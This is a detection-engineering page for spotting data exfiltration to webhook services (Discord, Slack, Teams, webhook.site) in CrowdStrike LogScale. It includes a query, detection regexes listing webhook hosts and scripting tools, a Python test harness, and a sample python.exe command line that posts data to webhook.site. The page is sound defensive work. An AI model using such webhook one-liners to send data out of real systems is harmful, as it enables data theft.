T1567.004 CrowdStrike LogScale · LogScale

Detect Exfiltration Over Webhook in CrowdStrike LogScale

Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple HTTP/S push mechanisms supported by collaboration platforms such as Discord, Slack, and Microsoft Teams, and by generic services like webhook.site. Adversaries exploit these endpoints either by linking an adversary-controlled webhook to a victim-owned SaaS service for automated, repeated exfiltration of emails or chat messages, or by manually posting staged data directly to a webhook URL with scripting tools. Because webhook traffic is HTTPS and destined for widely trusted SaaS domains, it blends with normal enterprise traffic and often bypasses data loss prevention controls. Observed real-world usage includes Discord webhooks for credential and token exfiltration from malicious npm packages, Slack webhooks used by insider threats, and Microsoft Teams webhooks abused via SQL Server xp_cmdshell lateral movement chains.

MITRE ATT&CK

Tactic: Exfiltration
Technique: T1567 Exfiltration Over Web Service
Sub-technique: T1567.004 Exfiltration Over Webhook
Canonical reference: https://attack.mitre.org/techniques/T1567/004/

LogScale Detection Query

// Signal 1: scripting/LOLBin process resolving a known webhook service.
// NetworkConnectIP4/IP6 events carry only a remote IP (no hostname), so the DomainName
// filter below is satisfied by DnsRequest events; to score the connect events as well,
// join them to the preceding DnsRequest from the same aid and ContextProcessId.
in(field="#event_simpleName", values=["DnsRequest", "NetworkConnectIP4", "NetworkConnectIP6"])
| DomainName = /(?i)(discord\.com|discordapp\.com|hooks\.slack\.com|slack\.com|webhook\.site|webhooks\.site|outlook\.office\.com|outlook\.office365\.com|pipedream\.net|requestbin\.com|requestcatcher\.com|hookbin\.com|beeceptor\.com|smee\.io|ntfy\.sh|pushover\.net)/
| ContextBaseFileName = /(?i)(powershell\.exe|pwsh\.exe|cmd\.exe|python\.exe|python3|node\.exe|curl\.exe|wget\.exe|wscript\.exe|cscript\.exe|mshta\.exe|rundll32\.exe|regsvr32\.exe|bitsadmin\.exe|certutil\.exe)$/
| groupBy([ComputerName, UserName, ContextBaseFileName, DomainName], function=[
    count(aid, as=ConnectionCount),
    min(@timestamp, as=FirstSeen),
    max(@timestamp, as=LastSeen)
  ])
| SignalType := "SuspiciousProcessWebhookDNS"

// Signal 2: webhook URL pattern in a process command line (staged manual POST).
// Run separately and union with Signal 1. The second regex uses a named capture group to
// extract the matched host into DomainName, and the output fields are named the same as in
// Signal 1 (ContextBaseFileName, ConnectionCount) so the combined summary below works on both.
// #event_simpleName = "ProcessRollup2"
// | CommandLine = /(?i)(discord\.com\/api\/webhooks|hooks\.slack\.com\/services|webhook\.site|outlook\.office\.com\/webhook|outlook\.office365\.com\/webhook|pipedream\.net|requestbin\.com|hookbin\.com|beeceptor\.com|ntfy\.sh|smee\.io)/
// | CommandLine = /(?i)(?<DomainName>discord\.com|hooks\.slack\.com|webhook\.site|outlook\.office\.com|outlook\.office365\.com|pipedream\.net|requestbin\.com|hookbin\.com|beeceptor\.com|ntfy\.sh|smee\.io)/
// | ContextBaseFileName := FileName
// | groupBy([ComputerName, UserName, ContextBaseFileName, DomainName], function=[
//     count(aid, as=ConnectionCount),
//     min(@timestamp, as=FirstSeen),
//     max(@timestamp, as=LastSeen)
//   ])
// | SignalType := "WebhookURLInCommandLine"

// Combined summary view after union (also valid on Signal 1 alone):
| groupBy([ComputerName, UserName, ContextBaseFileName, SignalType], function=[
    sum(ConnectionCount, as=TotalConnections),
    min(FirstSeen, as=EarliestSeen),
    max(LastSeen, as=LatestSeen),
    collect(DomainName, as=WebhookTargets)
  ])
| TotalConnections > 0
| sort(TotalConnections, order=desc)
Severity: high. Confidence: medium.

CrowdStrike LogScale CQL detecting exfiltration over webhook endpoints using Falcon sensor telemetry. Signal 1 matches DnsRequest events in which the resolving process is a known LOLBin or scripting executable and the requested domain belongs to a known webhook service; NetworkConnectIP4/IP6 events are included in the event filter but carry only a remote IP, so they contribute only when joined to a preceding DnsRequest from the same process. Signal 2 (commented out; run it separately and union the results) matches ProcessRollup2 events whose CommandLine contains a webhook URL pattern, covering staged manual POST exfiltration. Results are grouped by host, user, and process to surface high-frequency webhook contacts and hosts that touch several webhook targets, which can indicate a lateral movement chain.

Data Sources

  • CrowdStrike Falcon Endpoint Activity Monitor
  • CrowdStrike Falcon DNS telemetry (DnsRequest events)
  • CrowdStrike Falcon network telemetry (NetworkConnectIP4/IP6)
  • CrowdStrike Falcon process telemetry (ProcessRollup2)

Required Tables

  • DnsRequest
  • NetworkConnectIP4
  • NetworkConnectIP6
  • ProcessRollup2

False Positives & Tuning

  • Build automation agents (Jenkins, GitLab Runner) running under service accounts that use curl or Python to post CI/CD pipeline status notifications to Slack or Teams incoming webhooks.
  • Endpoint management or monitoring agents (Ansible, Chef, Puppet) executing scripts that include webhook.site or requestbin.com URLs for HTTP callback testing during configuration management tasks.
  • Incident response and threat hunting scripts executed by security analysts that query webhook delivery sites like smee.io or ntfy.sh to receive callback signals from test payloads.
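To check the grouping, union and tuning logic before the CQL above is deployed, the two signals and the allow-list suppression can be modelled offline. The following Python is an added example, not code from this page or from CrowdStrike: it runs the same host and process patterns over constructed Falcon-style events, mirrors the two groupBy stages, and drops rows that match a constructed allow-list of the known-good automation described in the tuning notes. Event field names follow the Falcon fields used in the query; the sample events, the allow-list triples and the helper functions are assumptions.

```python
"""Offline model of the two LogScale webhook-exfiltration signals (added example)."""
import re

# Same host and process patterns the LogScale query uses.
WEBHOOK_DOMAIN_RE = re.compile(
    r"(?i)(discord\.com|discordapp\.com|hooks\.slack\.com|slack\.com|webhook\.site|"
    r"outlook\.office\.com|outlook\.office365\.com|pipedream\.net|requestbin\.com|"
    r"hookbin\.com|beeceptor\.com|smee\.io|ntfy\.sh|pushover\.net)"
)
WEBHOOK_URL_RE = re.compile(
    r"(?i)(discord\.com/api/webhooks|hooks\.slack\.com/services|webhook\.site|"
    r"outlook\.office\.com/webhook|outlook\.office365\.com/webhook|pipedream\.net|"
    r"requestbin\.com|hookbin\.com|beeceptor\.com|ntfy\.sh|smee\.io)"
)
SCRIPT_HOST_RE = re.compile(
    r"(?i)(powershell\.exe|pwsh\.exe|cmd\.exe|python\.exe|python3|node\.exe|curl\.exe|"
    r"wget\.exe|wscript\.exe|cscript\.exe|mshta\.exe|rundll32\.exe|regsvr32\.exe|"
    r"bitsadmin\.exe|certutil\.exe)$"
)

# Tuning allow-list (constructed): (UserName, process, webhook host) triples known to be
# benign, e.g. a CI service account posting build status to a Slack incoming webhook.
ALLOW_LIST = {("svc_jenkins", "curl.exe", "hooks.slack.com")}

# Constructed sample telemetry; timestamps are plain integers for readability.
SAMPLE_EVENTS = [
    # alice's PowerShell resolves webhook.site twice
    {"event_simpleName": "DnsRequest", "aid": "a1", "timestamp": 100, "ComputerName": "WS01",
     "UserName": "alice", "ContextBaseFileName": "powershell.exe", "DomainName": "webhook.site"},
    {"event_simpleName": "DnsRequest", "aid": "a1", "timestamp": 160, "ComputerName": "WS01",
     "UserName": "alice", "ContextBaseFileName": "powershell.exe", "DomainName": "webhook.site"},
    # browser resolving discord.com: not a scripting host, ignored
    {"event_simpleName": "DnsRequest", "aid": "a1", "timestamp": 170, "ComputerName": "WS01",
     "UserName": "alice", "ContextBaseFileName": "chrome.exe", "DomainName": "discord.com"},
    # raw connect event: no DomainName, so Signal 1 cannot score it on its own
    {"event_simpleName": "NetworkConnectIP4", "aid": "a1", "timestamp": 161, "ComputerName": "WS01",
     "UserName": "alice", "ContextBaseFileName": "powershell.exe", "RemoteAddressIP4": "203.0.113.10"},
    # CI service account posting to Slack: suppressed by the allow-list
    {"event_simpleName": "DnsRequest", "aid": "a2", "timestamp": 200, "ComputerName": "BUILD01",
     "UserName": "svc_jenkins", "ContextBaseFileName": "curl.exe", "DomainName": "hooks.slack.com"},
    # Python one-liner carrying a webhook URL in its command line (placeholder path)
    {"event_simpleName": "ProcessRollup2", "aid": "a3", "timestamp": 300, "ComputerName": "WS02",
     "UserName": "bob", "FileName": "python.exe",
     "CommandLine": "python.exe -c \"import urllib.request; urllib.request.urlopen("
                    "'https://webhook.site/PLACEHOLDER', data=b'...')\""},
    {"event_simpleName": "ProcessRollup2", "aid": "a3", "timestamp": 310, "ComputerName": "WS02",
     "UserName": "bob", "FileName": "notepad.exe", "CommandLine": "notepad.exe report.txt"},
]


def _aggregate(matches, signal_type):
    """groupBy([ComputerName, UserName, ContextBaseFileName, DomainName]) with count/min/max."""
    rows = {}
    for host, user, proc, domain, ts in matches:
        row = rows.setdefault((host, user, proc, domain), {
            "ComputerName": host, "UserName": user, "ContextBaseFileName": proc,
            "DomainName": domain, "ConnectionCount": 0, "FirstSeen": ts, "LastSeen": ts,
            "SignalType": signal_type})
        row["ConnectionCount"] += 1
        row["FirstSeen"] = min(row["FirstSeen"], ts)
        row["LastSeen"] = max(row["LastSeen"], ts)
    return list(rows.values())


def signal_webhook_dns(events):
    """Signal 1: scripting host resolving a known webhook service."""
    matches = []
    for ev in events:
        if ev["event_simpleName"] not in ("DnsRequest", "NetworkConnectIP4", "NetworkConnectIP6"):
            continue
        domain, proc = ev.get("DomainName", ""), ev.get("ContextBaseFileName", "")
        if WEBHOOK_DOMAIN_RE.search(domain) and SCRIPT_HOST_RE.search(proc):
            matches.append((ev["ComputerName"], ev["UserName"], proc, domain.lower(), ev["timestamp"]))
    return _aggregate(matches, "SuspiciousProcessWebhookDNS")


def signal_webhook_cmdline(events):
    """Signal 2: webhook URL pattern in a ProcessRollup2 command line."""
    matches = []
    for ev in events:
        if ev["event_simpleName"] != "ProcessRollup2":
            continue
        m = WEBHOOK_URL_RE.search(ev.get("CommandLine", ""))
        if m:
            host = m.group(1).lower().split("/")[0]  # host part of the matched URL fragment
            matches.append((ev["ComputerName"], ev["UserName"], ev["FileName"], host, ev["timestamp"]))
    return _aggregate(matches, "WebhookURLInCommandLine")


def summarize(events, allow_list=ALLOW_LIST):
    """Union of both signals, allow-list suppression, then the final groupBy and sort."""
    summary = {}
    for r in signal_webhook_dns(events) + signal_webhook_cmdline(events):
        if (r["UserName"], r["ContextBaseFileName"], r["DomainName"]) in allow_list:
            continue  # tuned-out known-good automation
        key = (r["ComputerName"], r["UserName"], r["ContextBaseFileName"], r["SignalType"])
        s = summary.setdefault(key, {
            "ComputerName": r["ComputerName"], "UserName": r["UserName"],
            "ContextBaseFileName": r["ContextBaseFileName"], "SignalType": r["SignalType"],
            "TotalConnections": 0, "EarliestSeen": r["FirstSeen"], "LatestSeen": r["LastSeen"],
            "WebhookTargets": []})
        s["TotalConnections"] += r["ConnectionCount"]
        s["EarliestSeen"] = min(s["EarliestSeen"], r["FirstSeen"])
        s["LatestSeen"] = max(s["LatestSeen"], r["LastSeen"])
        if r["DomainName"] not in s["WebhookTargets"]:
            s["WebhookTargets"].append(r["DomainName"])
    return sorted(summary.values(), key=lambda s: s["TotalConnections"], reverse=True)


if __name__ == "__main__":
    for row in summarize(SAMPLE_EVENTS):
        print(row)
```

Running it yields two rows: alice's PowerShell on WS01 with two contacts to webhook.site, and bob's python.exe on WS02 flagged from its command line; the Jenkins service account on BUILD01 appears only when `summarize` is called with an empty allow-list, which is the quickest way to see what a tuning entry suppresses before adding the equivalent exclusion to the CQL.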

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: Exfiltrate Data via Discord Webhook using PowerShell

    Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'Invoke-RestMethod' and 'webhook.site'. Sysmon Event ID 3: Network Connection from powershell.exe to webhook.site on port 443. DeviceNetworkEvents: RemoteUrl containing webhook.site, InitiatingProcessFileName=powershell.exe, BytesSent > 0.

  2. Test 2: Exfiltrate File Contents via curl to Webhook Endpoint

    Expected signal: Sysmon Event ID 1: Process Create for cmd.exe (echo/type) and curl.exe with CommandLine containing 'webhook.site' and '-X POST'. Sysmon Event ID 11: File Create for the staging file in %TEMP%. Sysmon Event ID 3: Network Connection from curl.exe to webhook.site on port 443. DeviceNetworkEvents: InitiatingProcessFileName=curl.exe, RemoteUrl containing webhook.site.

  3. Test 3: Python Requests Library Webhook Exfiltration

    Expected signal: Sysmon Event ID 1: Process Create with Image=python.exe, CommandLine containing 'urllib.request', 'webhook.site', and 'POST'. Sysmon Event ID 3: Network Connection from python.exe to webhook.site on port 443. DeviceNetworkEvents: InitiatingProcessFileName=python.exe, RemoteUrl=webhook.site.

  4. Test 4: Automated SaaS Webhook Exfiltration via Microsoft Teams Incoming Webhook

    Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'Invoke-WebRequest' and 'outlook.office.com/webhook'. Sysmon Event ID 3: Network Connection from powershell.exe to outlook.office.com on port 443. DeviceNetworkEvents: RemoteUrl containing /webhook/, InitiatingProcessFileName=powershell.exe.
